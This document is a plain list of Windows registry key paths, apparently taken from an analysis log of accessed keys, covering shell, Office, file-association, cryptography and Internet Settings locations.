HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\57\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\57\52C64B7E\@%SystemRoot%\system32\packager.dll,-2000
HKEY_CURRENT_USER_LOCAL_SETTINGS\Software\Microsoft\Windows\Shell
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUList
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUList
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\42\Shell
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\42\Shell\KnownFolderDerivedFolderType
HKEY_LOCAL_MACHINE\Software\Classes\Folder\
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride\{C845E028-E091-442E-8202-21F596C559A0}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{7BA4C740-9E81-11CF-99D3-00AA004AE837}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{3DAD6C5D-2167-4CAE-9914-F99E41C12CFA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{85BBD920-42A0-1069-A2E4-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{896664F7-12E1-490F-8782-C0835AFD98FC}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{596AB062-B4D2-4215-9F74-E9109B0A8153}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{0A88C858-7D0C-4549-9499-7DB05F0CB0BF}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{1A0391BF-9564-4294-B0A4-06C298929EF9}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{A470F8CF-A1E8-4F65-8335-227475AA5C46}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{23170F69-40C1-278A-1000-000100020000}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{BD472F60-27FA-11CF-B8B4-444553540000} {000214E4-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{14074E0B-7216-4862-96E6-53CADA442A56}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{EEA0C191-DDA8-4656-8FC4-72BDEDBA8A78}
HKEY_LOCAL_MACHINE\Software\Classes\JSFile\
HKEY_CURRENT_USER\Software\Classes\*\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{09799AFB-AD67-11D1-ABCD-00C04FC30936}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile
HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\57\52C64B7E\@C:\Windows\System32\wshext.dll,-4511
HKEY_LOCAL_MACHINE\Software\Classes\JSFile\shell\Open\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RibbonCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\ONPREM_SHAREPOINT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\ONPREM_SHAREPOINT_OTHER
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\ONPREM_SHAREPOINT_OTHER\Metadata
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\ONPREM_SHAREPOINT_OTHER\Thumbnails
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\ONPREM_SHAREPOINTGROUP
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\ONPREM_SHAREPOINTGROUP\Metadata
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\ONPREM_SHAREPOINTGROUP\Thumbnails
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML
HKEY_CURRENT_USER\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16\(Default)
HKEY_CLASSES_ROOT\ChromeHTML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\KnownIDs
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\DefaultIcon
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\ShellEx
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\ShellEx\IconHandler\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel
HKEY_CLASSES_ROOT\.htm
HKEY_CURRENT_USER\Software\Classes\.htm\OpenWithList
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\(Default)
HKEY_CLASSES_ROOT\mhtmlfile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\KnownIDs
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\DefaultIcon
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\ShellEx
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon\(Default)
HKEY_CLASSES_ROOT\.mht
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\LabelText
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\Save
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowButtons
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowIndicators
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoLabelOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoSaveOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoButtonOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoIndicatorOption
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Type
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\DESHashSessionKeyBackward
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\CacheReady
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\LastRequest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\LastUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\0"o
HKEY_CURRENT_USER\SOFTWARE\IM Providers\
HKEY_CURRENT_USER\SOFTWARE\IM Providers\DefaultIMApp
HKEY_CURRENT_USER\SOFTWARE\IM Providers\Lync
HKEY_CURRENT_USER\SOFTWARE\IM Providers\Communicator
HKEY_CURRENT_USER\SOFTWARE\IM Providers\MSN Messenger
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39B8AF29&0&0001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Capabilities
